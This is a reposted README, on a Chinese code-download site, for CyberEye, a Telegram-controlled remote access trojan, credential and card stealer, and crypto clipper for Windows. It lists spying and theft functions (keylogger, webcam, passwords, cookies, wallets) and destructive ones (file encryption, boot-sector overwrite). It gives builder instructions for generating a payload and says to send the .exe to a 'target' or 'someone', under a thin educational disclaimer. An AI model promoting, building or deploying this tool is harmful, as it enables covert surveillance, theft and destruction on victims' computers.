CyberEye

2025-12-07 0 328

?️ CyberEye (RAT + STEALER + CLIPPER)

Modded Program for remote control of windows computers via telegram bot. Written in C#

LEGAL DISCLAIMER PLEASE READ!

I, the creator and all those associated with the development and production of this program are not responsible for any actions and or damages caused by this software. You bear the full responsibility of your actions and acknowledge that this software was created for educational purposes only. This software\’s intended purpose is NOT to be used maliciously, or on any system that you do not have own or have explicit permission to operate and use this program on. By using this software, you automatically agree to the above.

Just created a fun video about my Cyber Eye RAT check it out!

? Table of Contents

  • CyberEye (RAT + STEALER + CLIPPER)
    • LEGAL DISCLAIMER PLEASE READ!
      • Responsibility Disclaimer
  • Original Functions
  • Modded Functions
  • Compiling guide using Builder
  • Compiling guide using Builder Wine/Linux
    • System Requirements
      • Minimum
      • Recommended
    • Installation Process
      • 1. Install Dependencies
        • Ubuntu/Debian
        • Arch Linux/Manjaro
        • Fedora
    • .NET Framework 4.8 Installation
      • Clean Setup
      • Install .NET 4.8
      • Verify Installation
    • Wine / Linux Common Troubleshooting Guide
      • Standalone Payload Builder Introduction
    • Key Features
      • Builder Highlights
  • Alternative (OLD) Compiling guide using Visual Studio
    • Star History
  • Donate

? Original Functions:

ComputerInfo, BatteryInfo, Location, Whois, ActiveWindow, Webcam, Microphone, Desktop, Keylogger, ClipboardSet, ClipboardGet, ProcessList, ProcessKill, ProcessStart, TaskManagerDisable, TaskManagerEnable, MinimizeAllWindows, MaximizeAllWindows, GetPasswords, GetCreditCards, GetHistory, GetBookmarks, GetCookies, GetDesktop, GetFileZilla, GetDiscord, GetTelegram, GetSteam, OpenCD, CloseCD, DownloadFile, UploadFile, RunFile, RunFileAdmin, ListFiles, RemoveFile, RemoveDir, MoveFile, MoveDir, CopyFile, CopyDir, Speak, Shell, MessageBox, OpenURL, SendKeyPress, NetDiscover, AudioVolumeSet, AudioVolumeGet, SetWallPaper, BlockInput, Monitor(off/on), DisplayRotate, EncryptFileSystem, DecryptFileSystem,ForkBomb, BsoD, OverwriteBootSector, Shutdown, Reboot, Hibernate, Logoff, Help, About, Uninstall.

Ⓜ Modded Functions:

AssemblyInfoChanging(config.cs), Beep, Cycle, Tray, SetRandomCurPos, Compiler, DirOrFile, Wifi_Steal, Regedit, Windefender, Cmd, SystemRestore, ScreenResolution, isAdmin, BugReport, Minecraft, CamList, MonitorList.

? Compiling guide using Builder:

  • Go to the @BotFather bot and create your own bot. You need to save the token and bot name.

  • Now you need to get your chat id. To do this, go to the next bot @chatid_echo_bot and save the id.

  • Now you need to download Latest stable release

  • After downloading the .zip archive, extract it to any folder on your system.

  • Inside the extracted folder, run the file CyberEye.Client.Builder.exe

  • Important: Make sure to also move the entire Stub folder (included in the archive) to the same directory as the Builder.
    Without the Stub folder in the correct location, the builder will not be able to generate the final payload.

  • In the builder, fill in the required fields:

    • Bot Token (from @BotFather)
    • Chat ID (from @chatid_echo_bot)
    • Enable optional features using checkboxes (e.g., Autorun, BSOD Protection, etc.)
  • Click Build, then choose where to save the final .exe payload.

? Compiling guide using Builder Wine/Linux:

Run Windows .NET applications seamlessly on Linux

This comprehensive guide will help you install and run CyberEye.Client.Builder.exe on Linux systems using Wine and Winetricks.


✅ System Requirements

Minimum:

  • OS: Ubuntu 20.04+, Debian 10+, Arch Linux, Fedora 33+
  • RAM: 4GB
  • Storage: 10GB free space
  • Wine: 7.0+ (stable)
  • Winetricks: latest

Recommended:

  • CPU: 4 cores+
  • RAM: 8GB+
  • Storage: SSD with 20GB+ free space

Installation Process

1. Install Dependencies

Ubuntu/Debian:

sudo dpkg --add-architecture i386
sudo apt update
sudo apt install -y \\
    wine64 \\
    wine32 \\
    winetricks \\
    cabextract \\
    libgl1-mesa-glx:i386

Arch Linux/Manjaro:

sudo pacman -S \\
    wine \\
    winetricks \\
    lib32-mesa \\
    giflib \\
    lib32-giflib \\
    libpng \\
    lib32-libpng \\
    libldap \\
    lib32-libldap \\
    gnutls \\
    lib32-gnutls \\
    mpg123 \\
    lib32-mpg123 \\
    openal \\
    lib32-openal \\
    v4l-utils \\
    lib32-v4l-utils \\
    libpulse \\
    lib32-libpulse \\
    alsa-plugins \\
    lib32-alsa-plugins \\
    alsa-lib \\
    lib32-alsa-lib \\
    libjpeg-turbo \\
    lib32-libjpeg-turbo \\
    libxcomposite \\
    lib32-libxcomposite \\
    libxinerama \\
    lib32-libxinerama \\
    ncurses \\
    lib32-ncurses \\
    opencl-icd-loader \\
    lib32-opencl-icd-loader \\
    libxslt \\
    lib32-libxslt \\
    libva \\
    lib32-libva \\
    gtk3 \\
    lib32-gtk3 \\
    vulkan-icd-loader \\
    lib32-vulkan-icd-loader

Fedora:

sudo dnf install \\
    wine \\
    winetricks \\
    cabextract \\
    vulkan-loader.i686 \\
    mesa-dri-drivers.i686

.NET Framework 4.8 Installation

Clean Setup:

# Remove existing prefix
rm -rf ~/.wine-dotnet48

# Initialize 32-bit prefix
WINEARCH=win32 WINEPREFIX=~/.wine-dotnet48 wineboot --init

# Install dependencies
WINEPREFIX=~/.wine-dotnet48 winetricks -q \\
    corefonts \\
    tahoma \\
    gdiplus \\
    msxml3 \\
    msxml6 \\
    vcrun2010 \\
    vcrun2013 \\
    vcrun2019

Install .NET 4.8:

WINEPREFIX=~/.wine-dotnet48 winetricks --force dotnet48

⏳ Installation takes 15-45 minutes. You\’ll see multiple Windows installers – just click \”Next\” through all of them.

Verify Installation:

WINEPREFIX=~/.wine-dotnet48 wine reg query \"HKLM\\\\Software\\\\Microsoft\\\\NET Framework Setup\\\\NDP\\\\v4\\\\Full\"

Should show version 4.8.xxxx.

  • Go to the @BotFather bot and create your own bot. You need to save the token and bot name.

  • Now you need to get your chat id. To do this, go to the next bot @chatid_echo_bot and save the id.

  • Now you need to download Latest stable release

  • After downloading the .zip archive, extract it to any folder on your system.

  • Inside the extracted folder, run the file CyberEye.Client.Builder.exe

    WINEPREFIX=~/.wine-dotnet48 wine CyberEye.Client.Builder.exe
  • Important: Make sure to also move the entire Stub folder (included in the archive) to the same directory as the Builder.
    Without the Stub folder in the correct location, the builder will not be able to generate the final payload.

  • In the builder, fill in the required fields:

    • Bot Token (from @BotFather)
    • Chat ID (from @chatid_echo_bot)
    • Enable optional features using checkboxes (e.g., Autorun, BSOD Protection, etc.)
  • Click Build, then choose where to save the final .exe payload.

? Wine / Linux Common Troubleshooting Guide:

Wine Mono is not installed

Fix:

Install Wine Mono manually or recreate the Wine prefix:

rm -rf ~/.wine
winecfg  # Accept prompts to install Mono and Gecko

ilasm.exe not found. Ensure .NET Framework is installed

Cause: .NET was not installed or was installed into a 64-bit prefix.

Fix:

Use a clean 32-bit prefix.

Reinstall .NET Framework via Winetricks:

WINEARCH=win32 WINEPREFIX=~/.wine-dotnet48 winetricks dotnet48

wine: could not load kernel32.dll, status c0000135

Cause: Corrupted Wine prefix or failed .NET install due to wrong architecture or low disk space.

Fix:

Ensure you have enough free disk space:
df -h ~

Recreate the prefix with the correct architecture:

   rm -rf ~/.wine-dotnet48
   WINEARCH=win32 WINEPREFIX=~/.wine-dotnet48 winecfg
   WINEPREFIX=~/.wine-dotnet48 winetricks dotnet48

✅ That’s it — no need to touch Visual Studio. Just fill, click, and deploy!

  • You can send the generated .exe payload to your target machine.
  • After starting the file, you can control the computer through the bot.
  • Write /help to see all available commands.

This release introduces a new standalone payload builder for CyberEye RAT, enabling users to generate customized payloads with ease.

? Key Features

Creating and customizing your own RAT has never been easier.
With the new Builder, you no longer need to open Visual Studio, manually edit config files, or compile the project yourself.
Simply run the Builder, fill in your desired options, and generate a fully working stub with just one click.

? Builder Highlights

  • No coding required – Everything is done through a user-friendly GUI.
  • Instant build – Generates a ready-to-use executable without needing Visual Studio or any compiler setup.
  • Secure Telegram Integration – Easily input your bot token and chat ID.
  • Fully configurable – Set all options directly from the Builder (admin rights, startup behavior, delay, wallet stealer, etc.).

Developed by Cisamu
Now enhanced with an easy-to-use Builder to streamline your workflow.

? Alternative (OLD) Compiling guide using Visual Studio:

  • Go to the @BotFather bot and create your own bot. You need to save the token and bot name.
  • Now you need to get your chat id. To do this, go to the next bot @chatid_echo_bot and save the id.
  • Now you need to download Visual Studio
  • Download the source code of this program.
  • Unzip the “Telegram RAT” folder to your desktop.
  • Open the TelegramRAT.sln file through Visual Studio.
  • Open file config.cs in project.
  • Insert your token from the bot and your chatID that you received earlier.
  • Above you need to select ”Release”.
  • Press CTRL + S to save. And CTRL + B to compile everything into an executable file.
  • You can send the received file to someone.
  • After starting the file, you can control the computer through the bot.
  • Write /help to see all available commands.

Star History

? Donate:

BTC: bc1q5exw2v9sa0yktp2t7xnq8ma2xpn5a29s7w283y
ETH: 0x8d797249170d263B959A3c688D8456adBcfBC319
XMRT: 0xF978FE35d00A201eB48aB3908993e14f312001a2

? ORIGINAL RAT VERSION

下载源码

通过命令行克隆项目:

git clone https://github.com/cisamu123/CyberEye.git

收藏 (0) 打赏

感谢您的支持,我会继续努力的!

打开微信/支付宝扫一扫,即可进行扫码打赏哦,分享从这里开始,精彩与您同在
点赞 (0)

申明:本文由第三方发布,内容仅代表作者观点,与本网站无关。对本文以及其中全部或者部分内容的真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。本网发布或转载文章出于传递更多信息之目的,并不意味着赞同其观点或证实其描述,也不代表本网对其真实性负责。

左子网 开发教程 CyberEye https://www.zuozi.net/31252.html

Particle
上一篇: Particle
openppp2
下一篇: openppp2
常见问题
  • 1、自动:拍下后,点击(下载)链接即可下载;2、手动:拍下后,联系卖家发放即可或者联系官方找开发者发货。
查看详情
  • 1、源码默认交易周期:手动发货商品为1-3天,并且用户付款金额将会进入平台担保直到交易完成或者3-7天即可发放,如遇纠纷无限期延长收款金额直至纠纷解决或者退款!;
查看详情
  • 1、描述:源码描述(含标题)与实际源码不一致的(例:货不对板); 2、演示:有演示站时,与实际源码小于95%一致的(但描述中有”不保证完全一样、有变化的可能性”类似显著声明的除外); 3、发货:不发货可无理由退款; 4、安装:免费提供安装服务的源码但卖家不履行的; 5、收费:价格虚标,额外收取其他费用的(但描述中有显著声明或双方交易前有商定的除外); 6、其他:如质量方面的硬性常规问题BUG等。 注:经核实符合上述任一,均支持退款,但卖家予以积极解决问题则除外。
查看详情
  • 1、左子会对双方交易的过程及交易商品的快照进行永久存档,以确保交易的真实、有效、安全! 2、左子无法对如“永久包更新”、“永久技术支持”等类似交易之后的商家承诺做担保,请买家自行鉴别; 3、在源码同时有网站演示与图片演示,且站演与图演不一致时,默认按图演作为纠纷评判依据(特别声明或有商定除外); 4、在没有”无任何正当退款依据”的前提下,商品写有”一旦售出,概不支持退款”等类似的声明,视为无效声明; 5、在未拍下前,双方在QQ上所商定的交易内容,亦可成为纠纷评判依据(商定与描述冲突时,商定为准); 6、因聊天记录可作为纠纷评判依据,故双方联系时,只与对方在左子上所留的QQ、手机号沟通,以防对方不承认自我承诺。 7、虽然交易产生纠纷的几率很小,但一定要保留如聊天记录、手机短信等这样的重要信息,以防产生纠纷时便于左子介入快速处理。
查看详情

相关文章

猜你喜欢
发表评论
暂无评论
官方客服团队

为您解决烦忧 - 24小时在线 专业服务